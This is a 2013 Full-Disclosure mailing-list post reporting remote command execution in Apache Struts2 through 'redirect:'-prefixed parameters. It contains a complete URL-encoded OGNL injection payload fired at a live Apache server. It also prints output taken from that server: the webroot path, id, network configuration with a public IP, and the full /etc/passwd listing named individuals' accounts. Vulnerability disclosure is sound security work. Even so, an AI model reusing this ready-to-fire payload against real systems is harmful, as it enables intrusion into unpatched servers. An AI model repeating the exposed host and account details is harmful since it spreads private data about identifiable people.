[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAPQ_=KVhyw_TFVYysKCFz2RhDSW9kpPCkigFdfGq1ny0+jE9WA@mail.gmail.com>
Date: Sun, 13 Oct 2013 17:28:19 +0800
From: you help <help.en@...yun.org>
To: full-disclosure@...ts.grok.org.uk
Subject: Apache Software Foundation A Subsite Remote
command execution
*Abstract:*
# Apache,Mind Yourself
Apache struts2 a vulnerability introduced by manipulating parameters
prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command
execution。
*Details:*
#show the webroot
http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/home/continuum/apache-continuum-1.4.1/apps/continuum
*Proofs of concept:*
#id
uid=1001(continuum) gid=1001(continuum) groups=1001(continuum)
#/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:ae:00:0b
inet addr:140.211.11.54 Bcast:140.211.11.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feae:b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22081926 errors:0 dropped:0 overruns:0 frame:0
TX packets:7627912 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:26173286052 (26.1 GB) TX bytes:3491916802 (3.4 GB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:42196069 errors:0 dropped:0 overruns:0 frame:0
TX packets:42196069 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:24001777186 (24.0 GB) TX bytes:24001777186 (24.0 GB)
#cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
landscape:x:102:108::/var/lib/landscape:/bin/false
gmcdonald:x:1000:1000:gmcdonald,,,:/home/gmcdonald:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
continuum:x:1001:1001::/home/continuum:/bin/sh
archiva:x:1002:1002::/home/archiva:/bin/sh
postfix:x:104:113::/var/spool/postfix:/bin/false
messagebus:x:105:115::/var/run/dbus:/bin/false
avahi:x:106:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
brett:x:1717:1717::/home/brett:/bin/bash
mysql:x:107:117:MySQL Server,,,:/var/lib/mysql:/bin/false
smmta:x:108:118:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:119:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
apbackup:x:1718:1718::/home/apbackup:/bin/sh
pctony:x:2097:2097::/home/pctony:/bin/bash
ntp:x:110:120::/home/ntp:/bin/false
evenisse:x:1003:1003:Emmanuel Venisse,,,:/home/evenisse:/bin/bash
puppet:x:111:121:Puppet configuration management
daemon,,,:/var/lib/puppet:/bin/false
olamy:x:1004:1004:Olivier Lamy,,,:/home/olamy:/bin/bash
usbmux:x:112:46:usbmux daemon,,,:/home/usbmux:/bin/false
markt:x:1787:1787:medthomas:/home/markt:/bin/bash
--------------------------------------------------------------------------------------------------------------------------------
*Author*:猪猪侠 <http://en.wooyun.org/whitehats/%E7%8C%AA%E7%8C%AA%E4%BE%A0>
*From: *http://en.wooyun.org/bugs/wooyun-2013-06?2605
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists